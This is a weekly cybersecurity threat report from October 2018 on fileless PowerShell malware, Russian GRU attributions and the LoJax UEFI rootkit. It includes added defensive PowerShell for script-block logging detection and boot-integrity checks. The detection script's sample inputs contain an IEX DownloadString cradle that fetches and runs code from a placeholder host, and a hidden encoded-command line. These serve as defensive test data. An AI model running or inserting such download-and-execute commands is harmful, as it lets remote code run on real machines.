Weekly Threat Report - 5th October 2018
Microsoft Warns Fileless Malware on the Rise
Media reporting has highlighted a recent warning from Microsoft that so-called ‘fileless’ malware attacks are on the rise.
According to the report, the trend towards fileless malware is being driven by the increasing effectiveness of antivirus solutions, which can detect the installation of malicious files on a hard-drive.
By contrast, traditional anti-malware products find fileless malware significantly more difficult to detect. This is because the malicious payload is not written to the hard-drive and is instead run directly in the system’s memory.
Fileless malware can use the default tools present on a computer, such as PowerShell, to achieve malicious effects, a tactic known as ‘living-off-the-land’.
Whilst fileless malware is nothing new, knowledge of how to implement it is becoming more widespread. This has been accelerated by an increase in the number of tools that assist in the creation of fileless malware. The use of fileless malware and other more sophisticated techniques will become increasingly prevalent as malicious actors find new ways of circumventing security controls.
The simplest way to avoid this type of threat is to disable tools such as PowerShell and Windows Management Instrumentation (WMI).
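As an added example (not part of the NCSC report), the following PowerShell shows the defender-side counterpart to the advice above for organisations that cannot simply disable PowerShell: turning on Script Block Logging so that in-memory command lines are recorded, and a small heuristic scan over logged script blocks. The registry key and Event ID 4104 are standard Windows features; the detection patterns, the function names, the two-year threshold and the sample script blocks are constructed for illustration and are not from Microsoft or the NCSC.

```powershell
# Added example (not from the NCSC report): defender-side checks for
# PowerShell-based 'living-off-the-land' activity. Assumes Windows 10 with
# PowerShell 5.1, where Script Block Logging (Event ID 4104) is available.

# Constructed heuristics commonly associated with in-memory execution.
# Not an exhaustive list; tune to your environment.
$SuspiciousPatterns = @(
    '(?i)-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}',   # -enc <base64 blob>
    '(?i)FromBase64String',                               # decoding an embedded payload
    '(?i)\b(iex|Invoke-Expression)\b',                    # evaluating generated code
    '(?i)DownloadString|DownloadFile|Net\.WebClient',     # download cradle
    '(?i)\[System\.Reflection\.Assembly\]::Load',         # loading a .NET assembly from memory
    '(?i)-w(indowstyle)?\s+hidden'                        # hidden console window
)

function Enable-ScriptBlockLogging {
    # Requires an elevated prompt. The Group Policy equivalent is
    # Computer Configuration > Administrative Templates > Windows Components >
    # Windows PowerShell > Turn on PowerShell Script Block Logging.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord
}

function Test-SuspiciousScriptBlock {
    # Scores one script block's text against the heuristics above.
    param([Parameter(Mandatory)][string]$ScriptText)
    $hits = @(foreach ($p in $SuspiciousPatterns) {
        if ($ScriptText -match $p) { $p }
    })
    [PSCustomObject]@{
        Suspicious = ($hits.Count -gt 0)
        Matched    = $hits
        Preview    = $ScriptText.Substring(0, [Math]::Min(80, $ScriptText.Length))
    }
}

function Get-SuspiciousScriptBlockEvents {
    # Reads recent 4104 events from the live log and returns only the flagged ones.
    param([int]$MaxEvents = 500)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Properties[2] of a 4104 event carries the ScriptBlockText field.
            $result = Test-SuspiciousScriptBlock -ScriptText $_.Properties[2].Value
            if ($result.Suspicious) {
                [PSCustomObject]@{
                    Time    = $_.TimeCreated
                    Matched = ($result.Matched -join ', ')
                    Preview = $result.Preview
                }
            }
        }
}

# Constructed sample script blocks, standing in for 4104 event text, so the
# heuristic can be exercised offline without touching the event log.
$samples = @(
    'Get-ChildItem C:\Users | Sort-Object Length',
    'powershell -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ==',
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/x")'
)
$samples | ForEach-Object { Test-SuspiciousScriptBlock -ScriptText $_ } |
    Format-Table Suspicious, @{ n = 'Matched'; e = { $_.Matched -join ' ; ' } }, Preview -AutoSize
```

Run `Enable-ScriptBlockLogging` once (elevated) and then `Get-SuspiciousScriptBlockEvents` on a schedule or from your SIEM collector; the offline sample run at the bottom lets you confirm the patterns behave as intended before pointing them at real logs. Of the three constructed samples, only the plain directory listing passes clean. Checking `$ExecutionContext.SessionState.LanguageMode` in user sessions is a useful companion control: a value of `ConstrainedLanguage` means the .NET and COM primitives that fileless tooling relies on are not available to interactive scripts.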
Attribution of Russian close access and remote cyber operations
Dutch and UK authorities attributed a range of malicious cyber activity to Russian military intelligence (GRU) on Thursday 4 October.
One operation was a close access operation against the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague. Unlike most malicious cyber operations, which are conducted remotely, this one required physical proximity to the targeted system. In this case the attackers used equipment to attempt to gain access to the OPCW’s Wi-Fi network. Other close access operations require hands-on access to a target’s devices.
Several other operations involved the use of spear-phishing, in which the attacker crafts an email targeted at a specific individual, aiming to make them click on a malicious link or open a malicious attachment.
In response to Thursday’s attributions, NCSC has also published a technical advisory on indicators of compromise for malware used by APT28.
NCSC has also published advice on avoiding phishing attacks and securing end user devices.
LoJax – A new type of rootkit
Security researchers at anti-virus software company ESET have revealed a new type of malware that is capable of surviving reinstallation of the Windows operating system or even hard drive replacement.
This type of clandestine rootkit is designed to provide continued privileged access to a computer while actively hiding its presence. This is the first time this type of malware has been seen ‘in the wild’.
The malware, dubbed “LoJax”, makes use of the Unified Extensible Firmware Interface (UEFI), which connects a computer’s firmware to its operating system and is largely replacing the Basic Input Output System (BIOS). Like BIOS, UEFI is installed at the time of manufacture and is the first program that runs when a computer is turned on. This enables LoJax to start every time the computer is booted.
The malware is based on an older version of a legitimate application called LoJack and/or Computrace, which enables stolen devices to be found. The code is hidden within the UEFI firmware and when started, connects to a command and control server over the internet.
The researchers have attributed LoJax to the threat group Sednit/Fancy Bear/APT28.
Removing the malware from an infected device involves updating (or re-flashing) the UEFI firmware, an operation not commonly done and certainly not by the typical user.
Preventing infection is easier than curing it. PCs with Windows 8 and 10 are shipped with a feature called “Secure Boot” enabled, which is designed to prevent digitally unsigned software from hijacking the boot process and concealing itself from the operating system.
NCSC provides detailed guidance on the management of UEFI firmware settings which will almost certainly prevent this type of malware attack.
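As an added example (not from the NCSC, ESET or the LoJax write-up), the following PowerShell gathers the boot-level facts a defender would check after reading the above: whether the machine boots via UEFI, whether Secure Boot is confirmed on, and what firmware version and date the SMBIOS tables report, so the machine can be compared against the vendor’s latest release. `Confirm-SecureBootUEFI`, `$env:firmware_type` and the `Win32_BIOS` class are standard on Windows 8 and later; the function names and the “firmware older than two years” threshold are constructed for illustration.

```powershell
# Added example (not from the NCSC report or ESET): posture check for the boot
# controls the LoJax section relies on. Run from an elevated PowerShell on
# Windows 8/10. Confirm-SecureBootUEFI throws when the machine boots in legacy
# BIOS mode or when the shell is not elevated; the try/catch records that.

function Get-BootIntegrityPosture {
    $firmwareType = $env:firmware_type        # 'UEFI' or 'Legacy', set by Windows

    try {
        $secureBoot = Confirm-SecureBootUEFI  # $true when Secure Boot is enforced
    } catch {
        $secureBoot = "Unavailable ($($_.Exception.Message))"
    }

    # Firmware identity and build date from SMBIOS. Get-CimInstance returns
    # ReleaseDate as a [datetime]. Re-flashing is the only remediation for a
    # UEFI implant, so knowing the current version matters.
    $bios      = Get-CimInstance -ClassName Win32_BIOS
    $baseboard = Get-CimInstance -ClassName Win32_BaseBoard

    [PSCustomObject]@{
        FirmwareType    = $firmwareType
        SecureBootOn    = $secureBoot
        FirmwareVendor  = $bios.Manufacturer
        FirmwareVersion = $bios.SMBIOSBIOSVersion
        FirmwareDate    = $bios.ReleaseDate
        Board           = "$($baseboard.Manufacturer) $($baseboard.Product)"
    }
}

function Test-BootIntegrityPosture {
    # Turns the raw posture into plain-language findings. The two-year age
    # threshold is a constructed heuristic, not a vendor or NCSC figure.
    param([Parameter(Mandatory)]$Posture)
    $findings = @()
    if ($Posture.FirmwareType -ne 'UEFI') {
        $findings += 'Booting in legacy BIOS mode: Secure Boot cannot be enforced.'
    }
    if ($Posture.SecureBootOn -ne $true) {
        $findings += "Secure Boot not confirmed enabled ($($Posture.SecureBootOn)): unsigned boot components would be accepted."
    }
    if ($Posture.FirmwareDate -is [datetime] -and
        $Posture.FirmwareDate -lt (Get-Date).AddYears(-2)) {
        $findings += "Firmware dated $($Posture.FirmwareDate.ToShortDateString()); check the OEM site for a newer release."
    }
    if ($findings.Count -eq 0) { $findings += 'No boot-integrity findings.' }
    return $findings
}

$posture = Get-BootIntegrityPosture
$posture | Format-List
Test-BootIntegrityPosture -Posture $posture
```

The output is a starting point for fleet-wide inventory rather than a detection of LoJax itself: the report notes that the implant sits in the firmware, below anything the operating system can inspect, so the practical controls are Secure Boot being on and firmware being kept current, both of which this script surfaces.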